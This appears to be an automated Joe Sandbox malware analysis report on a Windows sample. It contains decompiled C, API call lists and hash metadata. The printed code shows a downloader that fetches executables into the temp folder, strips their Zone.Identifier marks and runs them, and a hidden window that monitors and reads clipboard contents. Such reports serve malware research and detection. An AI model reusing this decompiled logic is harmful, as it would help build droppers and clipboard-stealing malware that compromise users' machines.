                                                                                                                                                                                                                                                                                    0x0040d54c
                                                                                                                                                                                                                                                                                    0x0040d553
                                                                                                                                                                                                                                                                                    0x0040d568
                                                                                                                                                                                                                                                                                    0x0040d583
                                                                                                                                                                                                                                                                                    0x0040d58b
                                                                                                                                                                                                                                                                                    0x0040d590
                                                                                                                                                                                                                                                                                    0x0040d59f
                                                                                                                                                                                                                                                                                    0x0040d5a4
                                                                                                                                                                                                                                                                                    0x0040d5c6
                                                                                                                                                                                                                                                                                    0x0040d5cc
                                                                                                                                                                                                                                                                                    0x0040d5dc
                                                                                                                                                                                                                                                                                    0x0040d5e2
                                                                                                                                                                                                                                                                                    0x0040d5ef
                                                                                                                                                                                                                                                                                    0x0040d60b
                                                                                                                                                                                                                                                                                    0x0040d611
                                                                                                                                                                                                                                                                                    0x0040d61e
                                                                                                                                                                                                                                                                                    0x0040d63a
                                                                                                                                                                                                                                                                                    0x0040d640
                                                                                                                                                                                                                                                                                    0x0040d64d
                                                                                                                                                                                                                                                                                    0x0040d653
                                                                                                                                                                                                                                                                                    0x0040d66d
                                                                                                                                                                                                                                                                                    0x0040d675
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d69e
                                                                                                                                                                                                                                                                                    0x0040d69e
                                                                                                                                                                                                                                                                                    0x0040d6ad
                                                                                                                                                                                                                                                                                    0x0040d6c6
                                                                                                                                                                                                                                                                                    0x0040d6d6
                                                                                                                                                                                                                                                                                    0x0040d6e1
                                                                                                                                                                                                                                                                                    0x0040d6ee
                                                                                                                                                                                                                                                                                    0x0040d6f3
                                                                                                                                                                                                                                                                                    0x0040d6fb
                                                                                                                                                                                                                                                                                    0x0040d740
                                                                                                                                                                                                                                                                                    0x0040d6fd
                                                                                                                                                                                                                                                                                    0x0040d702
                                                                                                                                                                                                                                                                                    0x0040d70f
                                                                                                                                                                                                                                                                                    0x0040d714
                                                                                                                                                                                                                                                                                    0x0040d71d
                                                                                                                                                                                                                                                                                    0x0040d71f
                                                                                                                                                                                                                                                                                    0x0040d726
                                                                                                                                                                                                                                                                                    0x0040d72a
                                                                                                                                                                                                                                                                                    0x0040d72a
                                                                                                                                                                                                                                                                                    0x0040d730
                                                                                                                                                                                                                                                                                    0x0040d730
                                                                                                                                                                                                                                                                                    0x0040d737
                                                                                                                                                                                                                                                                                    0x0040d6fb
                                                                                                                                                                                                                                                                                    0x0040d74d
                                                                                                                                                                                                                                                                                    0x0040d74d
                                                                                                                                                                                                                                                                                    0x0040d75a
                                                                                                                                                                                                                                                                                    0x0040d75a
                                                                                                                                                                                                                                                                                    0x0040d767
                                                                                                                                                                                                                                                                                    0x0040d772
                                                                                                                                                                                                                                                                                    0x0040d778
                                                                                                                                                                                                                                                                                    0x0040d781
                                                                                                                                                                                                                                                                                    0x0040d787
                                                                                                                                                                                                                                                                                    0x0040d78c
                                                                                                                                                                                                                                                                                    0x0040d79e
                                                                                                                                                                                                                                                                                    0x0040d7a4
                                                                                                                                                                                                                                                                                    0x0040d7a9
                                                                                                                                                                                                                                                                                    0x0040d7b8
                                                                                                                                                                                                                                                                                    0x0040d7bd
                                                                                                                                                                                                                                                                                    0x0040d7df
                                                                                                                                                                                                                                                                                    0x0040d7e8
                                                                                                                                                                                                                                                                                    0x0040d7ea
                                                                                                                                                                                                                                                                                    0x0040d7f2
                                                                                                                                                                                                                                                                                    0x0040d7f9
                                                                                                                                                                                                                                                                                    0x0040d7fa
                                                                                                                                                                                                                                                                                    0x0040d7fc
                                                                                                                                                                                                                                                                                    0x0040d803
                                                                                                                                                                                                                                                                                    0x0040d81c
                                                                                                                                                                                                                                                                                    0x0040d82c
                                                                                                                                                                                                                                                                                    0x0040d837
                                                                                                                                                                                                                                                                                    0x0040d851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d88e
                                                                                                                                                                                                                                                                                    0x0040d858
                                                                                                                                                                                                                                                                                    0x0040d86d
                                                                                                                                                                                                                                                                                    0x0040d872
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d874
                                                                                                                                                                                                                                                                                    0x0040d87b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d87f
                                                                                                                                                                                                                                                                                    0x0040d87f
                                                                                                                                                                                                                                                                                    0x0040d803
                                                                                                                                                                                                                                                                                    0x0040d897

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D4F9
                                                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 0040D500
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D520
                                                                                                                                                                                                                                                                                    • mbstowcs.NTDLL ref: 0040D583
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D58B
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D59F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D5C6
                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D5DC
                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D60B
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D63A
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040D66D
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040D69E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D6AD
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D6C6
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D6D6
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D72A
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040D702
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: memset.NTDLL ref: 0040D39E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: CreateProcessW.KERNEL32(00000000,'b@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040D3E5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: Sleep.KERNEL32(000003E8), ref: 0040D3F5
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D740
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D74D
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D75A
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D767
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D772
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D787
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0040D79E
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D7A4
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D7B8
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D7DF
                                                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040D7FC
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D81C
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D82C
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D837
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D6E1
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D204
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D225
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D244
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D25D
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040D858
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D87F
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D88E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36$]@
                                                                                                                                                                                                                                                                                    • API String ID: 3135114409-3650745090
                                                                                                                                                                                                                                                                                    • Opcode ID: 253f5bf38e39e51211eba36c55abd417b9e55c54e15ab7f3e3e88540c4e70a93
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a692bf560fa698191a4ba968421e092d812baa048ff7158642ad85748ebf153
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 253f5bf38e39e51211eba36c55abd417b9e55c54e15ab7f3e3e88540c4e70a93
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C291C6B5D00318ABEB24DB50DC45FED7779AB88301F0484F9F609A61C1DAB99AC4CF28
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 102 4041a0-4041c2 GetWindowLongW 103 4041c4-4041cb 102->103 104 4041e6-4041ed 102->104 105 4041d1-4041d5 103->105 106 404257-404268 IsClipboardFormatAvailable 103->106 107 404216-40421c 104->107 108 4041ef 104->108 109 4041f4-404211 SetClipboardViewer SetWindowLongW 105->109 110 4041d7-4041db 105->110 114 404273-40427d IsClipboardFormatAvailable 106->114 115 40426a-404271 106->115 112 404236-40423a 107->112 113 40421e-404234 SetWindowLongW 107->113 111 4043d4-4043ed DefWindowProcA 108->111 109->111 119 4041e1 110->119 120 40438d-4043ce RegisterRawInputDevices ChangeClipboardChain 110->120 121 404252 112->121 122 40423c-40424c SendMessageA 112->122 113->121 117 404288-404292 IsClipboardFormatAvailable 114->117 118 40427f-404286 114->118 116 40429b-40429f 115->116 124 4042a5-4042af OpenClipboard 116->124 125 40436f-404373 116->125 117->116 123 404294 117->123 118->116 119->111 120->111 121->111 122->121 123->116 124->125 126 4042b5-4042c6 GetClipboardData 124->126 127 404375-404385 SendMessageA 125->127 128 40438b 125->128 129 4042c8 126->129 130 4042cd-4042de GlobalLock 126->130 127->128 128->111 129->111 131 4042e0 130->131 132 4042e5-4042f6 130->132 131->111 133 4042f8-4042fc 132->133 134 404319-40432c call 403fb0 132->134 136 40432e-40433e call 4040d0 133->136 137 4042fe-404302 133->137 142 404341-404355 GlobalUnlock CloseClipboard 134->142 136->142 140 404304 137->140 141 404306-404317 call 403ef0 137->141 140->142 141->142 142->125 146 404357-40436c call 403480 call 408c70 142->146 146->125
                                                                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                    			E004041A0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                                                                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                                                    				struct HWND__* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                                                                    				long _t75;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t90;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t97;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t98;
                                                                                                                                                                                                                                                                                    				void* _t129;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                                                                                                                                                                                                                    				_v40 = _a8;
                                                                                                                                                                                                                                                                                    				if(_v40 > 0x308) {
                                                                                                                                                                                                                                                                                    					if(_v40 == 0x30d) {
                                                                                                                                                                                                                                                                                    						if(_a12 != _v8) {
                                                                                                                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v8 = _a16;
                                                                                                                                                                                                                                                                                    							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L38:
                                                                                                                                                                                                                                                                                    						_t75 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                    						return _t75;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v40 == 0x308) {
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                                                                                                                                                                                                                    						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                                                                                                                                                                                                                    							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                                                                                                                                                                                                                    								_v12 = 7;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v12 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v12 = 0xd;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                                                                                                                                                                                                                    						L34:
                                                                                                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v24 = GetClipboardData(_v12);
                                                                                                                                                                                                                                                                                    						if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    							_v20 = GlobalLock(_v24);
                                                                                                                                                                                                                                                                                    							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                                                                                                                                    								_v44 = _v12;
                                                                                                                                                                                                                                                                                    								if(_v44 == 1) {
                                                                                                                                                                                                                                                                                    									_t90 = E00403FB0(_v20, 0, 0);
                                                                                                                                                                                                                                                                                    									_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                                    									_v16 = _t90;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									if(_v44 == 7) {
                                                                                                                                                                                                                                                                                    										_t97 = E004040D0(_v20, 0, 0);
                                                                                                                                                                                                                                                                                    										_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                                    										_v16 = _t97;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										if(_v44 == 0xd) {
                                                                                                                                                                                                                                                                                    											_t98 = E00403EF0(_v20, _v20, 0);
                                                                                                                                                                                                                                                                                    											_t129 = _t129 + 8;
                                                                                                                                                                                                                                                                                    											_v16 = _t98;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								GlobalUnlock(_v24);
                                                                                                                                                                                                                                                                                    								CloseClipboard();
                                                                                                                                                                                                                                                                                    								if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    									E00403480(_v16);
                                                                                                                                                                                                                                                                                    									E00408C70(_v16);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L38;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v40 == 1) {
                                                                                                                                                                                                                                                                                    					_v8 = SetClipboardViewer(_a4);
                                                                                                                                                                                                                                                                                    					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_v40 == 2) {
                                                                                                                                                                                                                                                                                    						_v36 = 0;
                                                                                                                                                                                                                                                                                    						_v34 = 0;
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v26 = 0;
                                                                                                                                                                                                                                                                                    						_v36 = 1;
                                                                                                                                                                                                                                                                                    						_v34 = 6;
                                                                                                                                                                                                                                                                                    						_v32 = 1;
                                                                                                                                                                                                                                                                                    						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                                                                                                                                                                                                                    						ChangeClipboardChain(_a4, _v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L38;
                                                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                                                    0x004041b2
                                                                                                                                                                                                                                                                                    0x004041b8
                                                                                                                                                                                                                                                                                    0x004041c2
                                                                                                                                                                                                                                                                                    0x004041ed
                                                                                                                                                                                                                                                                                    0x0040421c
                                                                                                                                                                                                                                                                                    0x0040423a
                                                                                                                                                                                                                                                                                    0x0040424c
                                                                                                                                                                                                                                                                                    0x0040424c
                                                                                                                                                                                                                                                                                    0x0040421e
                                                                                                                                                                                                                                                                                    0x00404221
                                                                                                                                                                                                                                                                                    0x0040422e
                                                                                                                                                                                                                                                                                    0x0040422e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004041ef
                                                                                                                                                                                                                                                                                    0x004043d4
                                                                                                                                                                                                                                                                                    0x004043e4
                                                                                                                                                                                                                                                                                    0x004043ed
                                                                                                                                                                                                                                                                                    0x004043ed
                                                                                                                                                                                                                                                                                    0x004041ed
                                                                                                                                                                                                                                                                                    0x004041cb
                                                                                                                                                                                                                                                                                    0x00404257
                                                                                                                                                                                                                                                                                    0x00404268
                                                                                                                                                                                                                                                                                    0x0040427d
                                                                                                                                                                                                                                                                                    0x00404292
                                                                                                                                                                                                                                                                                    0x00404294
                                                                                                                                                                                                                                                                                    0x00404294
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040427f
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040426a
                                                                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                                                                    0x0040436f
                                                                                                                                                                                                                                                                                    0x00404373
                                                                                                                                                                                                                                                                                    0x00404385
                                                                                                                                                                                                                                                                                    0x00404385
                                                                                                                                                                                                                                                                                    0x004042b5
                                                                                                                                                                                                                                                                                    0x004042bf
                                                                                                                                                                                                                                                                                    0x004042c6
                                                                                                                                                                                                                                                                                    0x004042d7
                                                                                                                                                                                                                                                                                    0x004042de
                                                                                                                                                                                                                                                                                    0x004042e5
                                                                                                                                                                                                                                                                                    0x004042ef
                                                                                                                                                                                                                                                                                    0x004042f6
                                                                                                                                                                                                                                                                                    0x00404321
                                                                                                                                                                                                                                                                                    0x00404326
                                                                                                                                                                                                                                                                                    0x00404329
                                                                                                                                                                                                                                                                                    0x004042f8
                                                                                                                                                                                                                                                                                    0x004042fc
                                                                                                                                                                                                                                                                                    0x00404336
                                                                                                                                                                                                                                                                                    0x0040433b
                                                                                                                                                                                                                                                                                    0x0040433e
                                                                                                                                                                                                                                                                                    0x004042fe
                                                                                                                                                                                                                                                                                    0x00404302
                                                                                                                                                                                                                                                                                    0x0040430c
                                                                                                                                                                                                                                                                                    0x00404311
                                                                                                                                                                                                                                                                                    0x00404314
                                                                                                                                                                                                                                                                                    0x00404314
                                                                                                                                                                                                                                                                                    0x00404302
                                                                                                                                                                                                                                                                                    0x004042fc
                                                                                                                                                                                                                                                                                    0x00404345
                                                                                                                                                                                                                                                                                    0x0040434b
                                                                                                                                                                                                                                                                                    0x00404355
                                                                                                                                                                                                                                                                                    0x0040435b
                                                                                                                                                                                                                                                                                    0x00404367
                                                                                                                                                                                                                                                                                    0x0040436c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404355
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004042e0
                                                                                                                                                                                                                                                                                    0x004042c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040429f
                                                                                                                                                                                                                                                                                    0x004041d5
                                                                                                                                                                                                                                                                                    0x004041fe
                                                                                                                                                                                                                                                                                    0x0040420b
                                                                                                                                                                                                                                                                                    0x004041d7
                                                                                                                                                                                                                                                                                    0x004041db
                                                                                                                                                                                                                                                                                    0x0040438f
                                                                                                                                                                                                                                                                                    0x00404395
                                                                                                                                                                                                                                                                                    0x00404398
                                                                                                                                                                                                                                                                                    0x0040439b
                                                                                                                                                                                                                                                                                    0x004043a4
                                                                                                                                                                                                                                                                                    0x004043ad
                                                                                                                                                                                                                                                                                    0x004043b1
                                                                                                                                                                                                                                                                                    0x004043c0
                                                                                                                                                                                                                                                                                    0x004043ce
                                                                                                                                                                                                                                                                                    0x004043ce
                                                                                                                                                                                                                                                                                    0x004041db
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004041AC
                                                                                                                                                                                                                                                                                    • SetClipboardViewer.USER32 ref: 004041F8
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32 ref: 0040420B
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00404260
                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004042A7
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32 ref: 004042B9
                                                                                                                                                                                                                                                                                    • RegisterRawInputDevices.USER32 ref: 004043C0
                                                                                                                                                                                                                                                                                    • ChangeClipboardChain.USER32 ref: 004043CE
                                                                                                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 004043E4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d6eb097551fe403484d6df1eea500d8dda5268cf33ca3084c7f7c11ec5fa5c98
                                                                                                                                                                                                                                                                                    • Instruction ID: 12af2944b2afbdd2840b1e0cc58b104c1e1997fab1ca1becb874473cf393234d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6eb097551fe403484d6df1eea500d8dda5268cf33ca3084c7f7c11ec5fa5c98
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 927111B4A00208EFDF14DF94D948BEE77B4AF88305F14856AFA05B72D0D7799A40CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E004043F0() {
                                                                                                                                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                                                                                                    				struct _WNDCLASSEXW _v84;
                                                                                                                                                                                                                                                                                    				short _v596;
                                                                                                                                                                                                                                                                                    				unsigned int _t20;
                                                                                                                                                                                                                                                                                    				struct HWND__* _t27;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_v84.cbSize = 0;
                                                                                                                                                                                                                                                                                    					memset( &(_v84.style), 0, 0x2c);
                                                                                                                                                                                                                                                                                    					_t40 = _t39 + 0xc;
                                                                                                                                                                                                                                                                                    					_v84.cbSize = 0x30;
                                                                                                                                                                                                                                                                                    					_v84.lpfnWndProc = E004041A0;
                                                                                                                                                                                                                                                                                    					_v84.hInstance = GetModuleHandleW(0);
                                                                                                                                                                                                                                                                                    					_v84.lpszClassName =  &_v596;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						Sleep(1); // executed
                                                                                                                                                                                                                                                                                    						_t20 = GetTickCount();
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                                                                                                                                                                                                                    						_t40 = _t40 + 0x10;
                                                                                                                                                                                                                                                                                    					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                                                                                                                                                                                                                    					_t27 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0); // executed
                                                                                                                                                                                                                                                                                    					_v8 = _t27;
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                                                                                                                                                                                                                    							TranslateMessage( &_v36);
                                                                                                                                                                                                                                                                                    							DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    				} while (0 != 0);
